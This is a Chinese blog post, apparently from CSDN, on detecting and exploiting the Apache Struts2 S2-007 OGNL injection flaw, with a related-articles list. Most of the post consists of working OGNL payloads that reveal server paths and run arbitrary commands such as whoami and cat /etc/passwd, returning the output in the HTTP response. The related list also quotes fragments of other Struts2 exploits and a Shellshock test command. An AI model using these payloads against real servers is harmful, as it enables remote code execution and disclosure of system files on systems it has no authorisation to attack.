S2-007 远程代码执行漏洞检测与利用

最新推荐文章于 2024-07-19 23:30:50 发布
最新推荐文章于 2024-07-19 23:30:50 发布
阅读量1.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fly_hps/article/details/85001622
版权

漏洞原理

如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。

POC

a.获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

b、获取web路径

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

c、执行任意命令:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

执行任意命令时,如果所执行的命令需要组合,则将上述 payload 改为:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

 

FLy_鹏程万里
关注
专栏目录
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行(RCE)。 接下来是s2-016漏洞(CVE-2016-1000031),这是2016年发现的一个高危漏洞,也与OGNL有关。此漏洞在于Struts2的...
S2-007 远程代码执行漏洞
EC_Carrot的博客
08-07 632
漏洞简介 影响版本: 2.0.0 - 2.2.3 漏洞详细还是移步到这篇文章 漏洞复现 将exp传入可利用的age输入框里即可运行命令: ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2460
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
(注入)(RCE)(Struts2)s2-007漏洞学习笔记
最新发布
aaaadoga的博客
07-19 287
这篇文章是关于作者学习s2-007漏洞的笔记关于这篇文章,如果有建议或问题请留言或联系。
struts漏洞总结
Fiverya的博客
01-17 2830
struts2漏洞,从S2-001到 S2-061,嘿嘿。
struts2 CVE-2012-0838 S2-007 Remote Code Execution && Hotfix
weixin_34406796的博客
07-12 184
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description S2-007S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGN...
Struts2漏洞S2-001)漏洞原理及复现
weixin_73180072的博客
09-09 462
Struts2中允许用户提交包含OGNL表达式字符串的表单数据; 若表单验证失败,服务器会将用户提交的OGNL表达式进行解析执行
S2-016漏洞利用工具
05-03
S2-016漏洞,也被称为Struts2远程代码执行漏洞,是Apache Struts2框架中的一个严重安全缺陷。这个漏洞主要出现在Struts2的2.3.x版本,允许攻击者通过精心构造的HTTP请求头来执行任意系统命令,从而获取服务器的控制...
Struts2漏洞利用工具-可用于检测
08-01
这是一个远程代码执行漏洞,攻击者可以通过精心构造的HTTP请求头触发漏洞执行任意服务器端代码。此漏洞影响了大量使用Struts2的网站,包括政府和企业机构,因此引起了广泛关注和紧急响应。 对于防御Struts2漏洞,...
K8_Struts2_EXP S2-045 20170310.rar
03-31
S2-046与S2-045类似,也是OGNL注入漏洞,同样允许攻击者远程执行代码。这些工具通常以扫描器的形式存在,能够自动化检查服务器是否易受这两个漏洞的影响。由于工具是exe可执行文件,可能被防病毒软件误报为威胁,...
漏洞学习---S2-001 远程代码执行漏洞
qq_37698661的博客
06-17 336
漏洞原理 ​ 由于用户提交表单数据并且验证失败时,后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据当中,在真实的测试环境中,遇到注册或登录界面,存在提交数据失败情况,则后端会返回之前提交的数据信息,若后端使用%{value}对提交的数据执行了OGNL表达式解析,那么可以利用这点,直接构造payload进行远程代码执行操作. 漏洞环境 #使用vulhub进行漏洞演示 /vulhub-master/struts2/s2-001 docker-compose b
Struts2
weixin_34260991的博客
09-19 1694
Struts2_053 POC: %25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2...
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 584
从2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞,Struts2框架...
墨者学院中的一些漏洞复现
weixin_43940853的博客
09-15 651
Bash漏洞分析溯源 bash漏洞本质上是一个任意代码执行漏洞,是存在于linux命令行下的一种输出漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test 若存在该漏洞,正常情况下会输出(版本号小于bash 4.3的linux或者unix系统上执行以上命令) vulnerable this is a test 这里只是...
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 1214
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
S2-001漏洞分析
灰蜗牛
02-23 1290
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1430
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值